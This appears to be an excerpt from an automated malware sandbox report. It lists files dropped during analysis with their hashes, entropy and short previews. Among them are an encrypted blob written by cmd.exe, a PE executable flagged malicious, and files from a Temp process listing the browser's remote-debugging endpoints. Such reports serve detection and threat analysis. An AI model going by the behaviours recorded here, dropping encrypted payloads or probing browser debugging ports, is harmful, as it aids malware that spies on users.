                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                    MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                    SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                    SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                    SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:uriCache_
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.024287571810301
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclW7ZXRUY4Y:YWLSGTt1o9LuLgfGBPAzkVj/T8lW7pyy
                                                                                                                                                                                                                                                                                                    MD5:E6383388E8EFC4E586150DA16163E22B
                                                                                                                                                                                                                                                                                                    SHA1:CB8E27FC5ECF8053D78ABB14D81E469DB8D64005
                                                                                                                                                                                                                                                                                                    SHA-256:8B15F60AE24886752FC908043CA534EF48AD958238C17968AB8F2E5F2054A321
                                                                                                                                                                                                                                                                                                    SHA-512:EBF44F94405F437DDE57F243CF4C4948AD9FF08C972B549C2145BD69BA22B0A6946537C228E2CCEBF0AEB7C6D8CB99273D7458426A4E403F2A85255D624DC237
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1733374936549241}]}
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                                    MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                                    SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                                    SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                                    SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                    Size (bytes):44906
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.095194996531794
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWM+i1zNt7LnNErJEufhLnbKJDSgzMMd6qD47u3+CiB:+/Ps+wsI7yn/aKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                    MD5:C63A2FDEEFAAD6B547B8F9A3F7312A0B
                                                                                                                                                                                                                                                                                                    SHA1:9B5E16F4C47832ED5E5E387ABE1C3EB5E78951C2
                                                                                                                                                                                                                                                                                                    SHA-256:AF31407206EB57D5C0891B2CA6534EAFD83D2CAC616FF0F74F002CA23C10A9D5
                                                                                                                                                                                                                                                                                                    SHA-512:331E1B2837FB05DBB4B5B4453188889F94D5DA53094FFB6E41E7DAF9AF75E8A1833C16A66AA840BDE1344D91870593FDFFFF6D5608FE05DBE5463C2752488B5B
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2278
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.853832013409961
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKxrgxOxl9Il8u2E+04v6m1cC4zqaEp7+Qv96Md1rc:mPYQE+04v6QcC4+bjFu
                                                                                                                                                                                                                                                                                                    MD5:DFF7C93E55A08E926A330A65CD887244
                                                                                                                                                                                                                                                                                                    SHA1:CAFF28A360A258660C9450CD4B8F68EAEB00B91C
                                                                                                                                                                                                                                                                                                    SHA-256:A32DC6EC215F8DE41C273C076E9FE4263FF9021D87D5F506F68B5D9F90DAF801
                                                                                                                                                                                                                                                                                                    SHA-512:FF20DE818892C2B6F7392BE4087F3A50200764A6A3D7487528C34AB5E2C98CA4F0295B1C6744A4C43ACB32A9113E70023AE8C522EE584EC7468F909614E3F2B0
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.T.C.i.v.B.F.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.n.l.D.C.B.y.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):4622
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.9941104432108943
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKxExcxD9Il8u2aWIriYfyyh6rPuhalHP55//L4YrM6xVgKl6C1PWwcgFdpw:WYQsrZfosal557FjgudjcOdpq5go3L
                                                                                                                                                                                                                                                                                                    MD5:71B46E9C66B4B86850659D79B960A9E1
                                                                                                                                                                                                                                                                                                    SHA1:43BF235BD4406EA312FBADD3DB8002C41614DB5E
                                                                                                                                                                                                                                                                                                    SHA-256:803677606460CA1212DC7046D69C1DCCE6801444B49C841DF3EDA2F491CEF04C
                                                                                                                                                                                                                                                                                                    SHA-512:60A65BBEAB5933908B632F7C9E53C48C52C2C3E8ADCC68D6ECCF56285BF212F64C2A080CF49931D933698415925F1F84FA879EEB535D3A735943A2945942D2AB
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".M.5.P.e.b.+.h.F.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.n.l.D.C.B.y.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):2684
                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.898196942492133
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:uiTrlKx68Wa7xNxl9Il8u24N61iEvRy1mYdSVYOV7Xv5ZxrCcd/vc:aTYQ4NG1MhdlOR/XxmV
                                                                                                                                                                                                                                                                                                    MD5:65522588ACF10DCEE5F294313BDAE80F
                                                                                                                                                                                                                                                                                                    SHA1:83E7625AD1C538124726A5DF283E7EAE37B870E1
                                                                                                                                                                                                                                                                                                    SHA-256:4CEA7FEEF88A690808335993C585FCA3E5A89B9A36002B53C0E7DB8F772587BE
                                                                                                                                                                                                                                                                                                    SHA-512:95ECD6372362EFE64A64B5B6997C57F545E4016120250C35628226AE729EFD6DC50922287D8B80583DA20DC43FBB459EF2DB2378B310759488E3348E341DE02E
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".l.U.g.l.o.L.l.k.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.n.l.D.C.B.y.
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):3500
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.400251591276023
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:96:6NnCeHCANnCsbCNNnCE9CZNnC1dgECwNnC8CfNnCMDCHNnC4wC+NnCc3Cz:6NDNYNING3N0N7eNBENG
                                                                                                                                                                                                                                                                                                    MD5:04083571794D0A0E341DEB48A5BBB6B0
                                                                                                                                                                                                                                                                                                    SHA1:502D6BDC3A2C8D554EBBFBC040FB647893068F3F
                                                                                                                                                                                                                                                                                                    SHA-256:FEE4D5A9AB78CE3DF98B35CB8B3D2C65CFBF6C7D1F910B0FF47503B5EE2D9975
                                                                                                                                                                                                                                                                                                    SHA-512:EE7F5CE2E74D5B134391613B8F2BB334E230BEDFDF5CA89BEE0A4278BD416211649533A1FDF9C73DF4235E3F58922A4B740D1FC6E650307EBAA30675587E061C
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/43F1CB121D80BCB9436D9A9E4BABD0DB",.. "id": "43F1CB121D80BCB9436D9A9E4BABD0DB",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/43F1CB121D80BCB9436D9A9E4BABD0DB"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/6CDE575FE7025C4FE703B69BD5E92E1B",.. "id": "6CDE575FE7025C4FE703B69BD5E92E1B",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/6CDE575FE7025C4FE703B69BD5E92E1B"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws
                                                                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\471529\Verzeichnis.com
                                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1787
                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.375217479624655
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:48:SfNaoCDWPWFTECDW7fNaoCQCCfNaoC9CifNaoC010UrU0U8Cb:6NnC9TECWNnCQCqNnC9CKNnCs0UrU0UR
                                                                                                                                                                                                                                                                                                    MD5:E7BDA0E11E58A535B140A506B1C1395A
                                                                                                                                                                                                                                                                                                    SHA1:9CB7215D9A4F7C8ED6A15033C4CF4DCDA4635332
                                                                                                                                                                                                                                                                                                    SHA-256:0893376CB949CE07C453761F9A1FB381BF780961F33C1F8742585622101859F0
                                                                                                                                                                                                                                                                                                    SHA-512:AB12BEEF38F99F4A03A6844164F1B32AF992BB311694B0F3A26195C0EB2D713C49B055FE1E3503C6A12B11A2F128D22F01EB1EA553F285F2C076354FA42CAA10
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/FF218AB0D954DCF9CC31C3E2DEE6FDB2",.. "id": "FF218AB0D954DCF9CC31C3E2DEE6FDB2",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/FF218AB0D954DCF9CC31C3E2DEE6FDB2"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/C48E6D2240C7D062C344E0764B54ED9F",.. "id": "C48E6D2240C7D062C344E0764B54ED9F",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/C48E6D2240C7D062C344E0764B54ED9F"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):607673
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999702368029813
                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                    SSDEEP:12288:L/yxViuEXPTz8kek5oywGlShJwL558KRoeg+qBpkjqpXM6B:GxVi3fnpJnwAewnxRIBpkjqK6B
                                                                                                                                                                                                                                                                                                    MD5:1E4525FEE30AFE9D8F9567610546E080
                                                                                                                                                                                                                                                                                                    SHA1:664B281DD5A2741704F76150EE73882A13C765B4
                                                                                                                                                                                                                                                                                                    SHA-256:F35D246CCD6E557ACC321333015F70FBC3DAE9D248702C5FDF9FBD248F558F4A
                                                                                                                                                                                                                                                                                                    SHA-512:3904FCB475405097FFBFE66C0A268B3EC799768122AFCCAC430E302D43456D5782EFFDBD5E9FF62584364F2C8B760992B533A41DAE82A8C5F38D5783A5E46D9A
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.N......h..!..W. .h.X3.B....a...o.8.....*l.qAF.OO{w............07.<..c.ZT..^P..4m...Fc..;}.!.e.q9...Z..P>.Z..s....!.%u..(T?2......k.'q..$.%....d_q.OG..*J.U.........Q..0...x...`..O..A.c...7q5s....$.K..Y'.DP.o.Z.+...iu.#[...)...p.n..&.n<e........:..(6X....v......7..d,.L..Z.~...6.j....>KX.....8......`.P..V......z.......".9 (}.O\0......,..o.%Q.........3.._...../.1......UW)...l..C...yv^v.e...t...T..MN6.H....,P3.>X._...\.4......^.......80...9.f.5..2>.'yp.@....!}.kj.I.&.D...?T.~..+.+...nKYh.G.I%J....{.Yu[.Z....Y..Q:@.n.a6.|2.....W...!...F.*OK.i.H....4>'eE>.C..H.3..Ed2.........y<....".jS..rp..?....../~...RZ?...] ..\.P.......d..:C..loI.............(t.f..F..;@_..........=o9..b....).....lN...hx|=.k... !...h<u.#..M5~....O163...#.Z..J......e0...p.B.1...s....;.......n,.42.n.Y`. /..%.Na... ....HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..
                                                                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                                    Size (bytes):893608
                                                                                                                                                                                                                                                                                                    Entropy (8bit):6.620254876639106
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:12288:DpVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31troPTdFqgaAV2M0L:DT3E53Myyzl0hMf1te7xaA8M0L
                                                                                                                                                                                                                                                                                                    MD5:6EE7DDEBFF0A2B78C7AC30F6E00D1D11
                                                                                                                                                                                                                                                                                                    SHA1:F2F57024C7CC3F9FF5F999EE20C4F5C38BFC20A2
                                                                                                                                                                                                                                                                                                    SHA-256:865347471135BB5459AD0E647E75A14AD91424B6F13A5C05D9ECD9183A8A1CF4
                                                                                                                                                                                                                                                                                                    SHA-512:57D56DE2BB882F491E633972003D7C6562EF2758C3731B913FF4D15379ADA575062F4DE2A48CA6D6D9241852A5B8A007F52792753FD8D8FEE85B9A218714EFD0
                                                                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                                                                                                                    • Filename: File.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                    • Filename: Full_Setup_v24.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                    • Filename: 'Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                    • Filename: !SET__UP.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                    • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                    • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                    • Filename: receipt-016.vbs, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L......Z.........."...............................@.................................Jo....@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                    Size (bytes):31335
                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.694019108205432
                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                    SSDEEP:768:514ugFV0910SWyR5kNVdS3sNp/xm3MbiMuYEDlyFUyv6E/ty8:5WcDWyRKNVd2M/IxMuYEDlymsTQ8
                                                                                                                                                                                                                                                                                                    MD5:6B72597205C77D3E40E1A35BEE403801
                                                                                                                                                                                                                                                                                                    SHA1:6BECEE055C6E057AF9475B6D651B4EE561D02F20
                                                                                                                                                                                                                                                                                                    SHA-256:C899297FBDFC88C1634B1145A087FDB5BE17172FD786C078B299557B22F06DEB
                                                                                                                                                                                                                                                                                                    SHA-512:7CB1A98E0C7FBB349D9CB681233A9F4ED22A1C3FAADCDF1BC270B04BD97D3FC41AB6F762B2F5F231281D63D96AC3D243640BA81D5E8CCD9F54486B4F538CA8B4
                                                                                                                                                                                                                                                                                                    Malicious:false
